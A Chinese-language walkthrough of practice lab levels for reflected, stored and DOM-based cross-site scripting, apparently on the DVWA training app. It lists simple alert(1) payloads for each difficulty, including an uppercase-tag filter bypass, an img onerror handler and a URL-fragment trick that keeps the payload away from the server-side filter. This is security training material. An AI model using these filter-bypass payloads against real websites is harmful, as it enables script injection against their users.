XSS 反射型
low
-
试试经典代码
<script>alert(1)</script>

medium
-
先试试经典代码
<script>alert(1)</script>

- 查看页面源代码,前端好像看不出来什么,那就直接看后端

-
大写绕过
<SCRIPT>alert(1)</SCRIPT>

high
- 直接查看源代码

-
用HTML事件
<img onerror = 'alert(1)' src = "#">

impossible
查看源代码

XSS 存储型
low
- 查看源代码

-
试试经典代码
<script>alert(1)</script> -
name栏有字数限制

- 可以改前端代码,也可以就在message中输入

medium
- 查看源代码

-
试试大写
<SCRIPT>alert(1)</SCRIPT> //好像没什么用?在name栏改长度试试

high
- 查看源代码

-
用HTML事件
<img onerror='alert(1)' src="#"> //需要改name栏的长度

impossible
查看源代码

可以发现存储型XSS和反射型XSS过滤规则都一样,只是存储型将数据进行了存储
XSS DOM型
low
- 查看源代码

-
经典代码
<script>alert(1)</script> -
代码构造好了,在哪输入?选一下试试,url地址栏有回显

-
直接在url处输入代码
<script>alert(1)</script>

medium
- 查看源代码

- 加#注释,使过滤不生效

-
在url中加入#,总体注释掉
#?default=English<script>alert(1)</script>;

high
- 查看源代码

-
按照上一个等级的做法,将规则直接注释
#?default=English<script>alert(1)</script>;

impossible
查看源代码


编码绕过,不进行URL解码

文章详细介绍了XSS反射型、存储型和DOM型的攻击级别,从低到高,展示了不同级别的攻击示例和防御方法,强调了查看源代码和编码绕过的概念。
3679

被折叠的 条评论
为什么被折叠?



